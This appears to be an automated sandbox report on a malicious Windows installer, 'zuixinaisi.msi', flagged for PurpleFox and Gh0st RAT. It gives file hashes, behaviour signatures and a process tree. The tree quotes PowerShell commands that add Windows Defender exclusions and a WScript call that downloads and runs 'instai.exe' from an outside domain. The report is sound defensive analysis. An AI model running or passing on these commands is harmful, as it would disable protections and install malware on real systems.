Analysis

  • max time kernel
    133s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    14/09/2024, 08:11

General

  • Target

    zuixinaisi.msi

  • Size

    233.8MB

  • MD5

    df0ddca33d18cef60dbfdad992a21ff3

  • SHA1

    5db0a225c9713d93412d01c5df5398811e54d1e5

  • SHA256

    8e91a24111e14ac5cec2ee91633098ddc8606ee51d13b0c9d0f6087d597a189b

  • SHA512

    e217e0425cb0045bc15e4ed5e122e69bd4d6bee5170e961659aba94641305f6a274d648529ec577df41fcca383085cf31e9df66123e433dd2f6a408aa407ceda

  • SSDEEP

    6291456:/LGfwiT1I66Fm7gHvhjLvuYGpyLit5vFls1D:/cT1I6CFbopyLiLvyD

Malware Config

Signatures

  • Detect PurpleFox Rootkit 1 IoCs

    Detect PurpleFox Rootkit.

  • Gh0st RAT payload 1 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) whose source code is public; it has been used by multiple Chinese groups.

  • PurpleFox

    PurpleFox is an exploit kit, first seen in 2018, that is used to distribute other malware families.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely as a geofence check.

  • Drops file in Windows directory 14 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 24 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\zuixinaisi.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3040
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4652
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:644
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 9781470C31F07C43A7C9ADE697C0B704
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:112
      • C:\Windows\Installer\MSID09F.tmp
        "C:\Windows\Installer\MSID09F.tmp" /DontWait /RunAsAdmin /HideWindow "C:\ProgramData\i4Tools8.bat"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Access Token Manipulation: Create Process with Token
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4924
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ""C:\ProgramData\i4Tools8.bat" "
          3⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:5048
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Add-MpPreference -ExclusionPath "C:\ProgramData/instai.exe
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4808
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Add-MpPreference -ExclusionPath "C:\ProgramData
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:4564
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\ProgramData\DownloadFile.vbs" "https://vipusfsk.com/instai.exe" "C:/ProgramData\instai.exe"
            4⤵
            • Blocklisted process makes network request
            • System Location Discovery: System Language Discovery
            PID:2808
          • C:\ProgramData\instai.exe
            C:/ProgramData/instai.exe
            4⤵
            • Enumerates connected drives
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:3484
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious use of AdjustPrivilegeToken
      PID:4544

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Config.Msi\e58c765.rbs

      Filesize

      8KB

      MD5

      b9e0793acf2cab3acdae1376e71b88fc

      SHA1

      cbaa88dfa1b9026c3325d1d8b774786d9966a88d

      SHA256

      fe9b8bb495ede5eafa0b17a114ef3e47e84dfec2b2c51117dd5b5218626573e1

      SHA512

      20828ea6603ac4feb64bea2901b4f457e6a7a75c6c884d37a24f222536f5fa5a57086068737d805e9d0d14aedcdbae933b7d12c34b435ef8154036f461c2335e

    • C:\ProgramData\DownloadFile.vbs

      Filesize

      407B

      MD5

      2ff09853906bcaed82ddb57baca8eb1f

      SHA1

      95bf628e54a9eff2ac434fedc78193846def0139

      SHA256

      591a03bf9ca7daa56aa6fec2e008a9a5aa68bb4f9f25ae23f905ab79de23d795

      SHA512

      b6e7a58de13e6a3d760e769183921cc3658398c405d39f19cb4d26ab03b6898f3cf011391f1aaa9db9358d40131bd67e7a7df46cc8ff4298e4641232a078d740

    • C:\ProgramData\i4Tools8.bat

      Filesize

      1KB

      MD5

      10e4067312ac3173043783d46c328a99

      SHA1

      ec03017d71370619f553cd77b615ef6e2c781ff3

      SHA256

      048183e68c0f8526ad8ce2e0c61ecbe50f42eacf990e8e4026254b154d0ba4bf

      SHA512

      1f7799c14386c8bf3e65146f543e96052e809a55df9431b8b5baaef677218f870d35d963ef71f17cdfeb773f418a7e9a96ac68c851929ecd7a25e32954e35cd3

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      d14a1ef6ec7803a9a20c73d916e235b1

      SHA1

      5c6fec8d4531fb4240cd064197cdf05e53e09dd4

      SHA256

      0d3979b1f41879e417cf467eea8639d5d409bbbba49b0dabe6c9f0e5ab053b71

      SHA512

      339b6ad8db6b33912e4f50380047946a51e3e4ce6ea6332997467ae8322f96e5e8d501c44c26617716aad7ff3cff8ccdce24a18d78e92de4cd142b68727c96ad

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbthmjnf.sv5.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Windows\Installer\MSIC86C.tmp

      Filesize

      587KB

      MD5

      c7fbd5ee98e32a77edf1156db3fca622

      SHA1

      3e534fc55882e9fb940c9ae81e6f8a92a07125a0

      SHA256

      e140990b509dd6884a5742bde64f2cdaa10012d472b0b32de43ebecbc83242b6

      SHA512

      8691ac8b214cc1e4f34a3ab2bbc0c2391f7f11ebbe5db0dc82825195b5fe5a05310ed1e14d253a9b74a64050d2f2a6623dd2fcd912f80fef51e51845ef1e3a1a

    • C:\Windows\Installer\MSID09F.tmp

      Filesize

      419KB

      MD5

      cac0eaeb267d81cf3fa968ee23a6af9d

      SHA1

      cf6ae8e44fb4949d5f0b01b110eaba49d39270a2

      SHA256

      f1dd0dd1e83b28ffa2ed30f46f98e94a4919ec1f4e9d33720354288b77153774

      SHA512

      8edf9f733dda9000a6e2b70da61912dbc15f74c836d738391ceddcdff20f5b420a678450523cf331aa9bce90217aa92ac6e73d1880ae15c9842ccc7d3296f95b

    • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

      Filesize

      23.7MB

      MD5

      2097108849978c6e9f1fc140c871858c

      SHA1

      5ce14933e0a1d45745e636b96533638278746553

      SHA256

      c30765d285fe45cab3ea9417df3fbdccfcf64da4b255595dfdf86b9e361881f6

      SHA512

      2fcbe024e4d1bd41f0f1e4808f449877d9b22da9cc43afcddf6016e7b2a704a2d53bd27301cc24ad5335d1f3fe0c4a2dc901f7bb9a9e611c29b4701b542b2eda

    • \??\Volume{ff3ab8f7-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{5c1d19d8-22dc-4561-bf1b-3b776a81e0e6}_OnDiskSnapshotProp

      Filesize

      6KB

      MD5

      861e5be968c22b0376a9c435c6b16ebc

      SHA1

      9d2a0609ca3b055a3ac7d10500527aa093947a23

      SHA256

      21404338dff1c4fd1cf709aacbba4c4e42ea436f8947f441710b37bd062bc52f

      SHA512

      47adb6ad7a7dc3b483500bec0ca0a73713c985f077d7b93f3ebbf4dbe8fb8f78c97086034fe99803644fce32aba22eccfc3eae1493d0bb9cb108ac946c757dcd
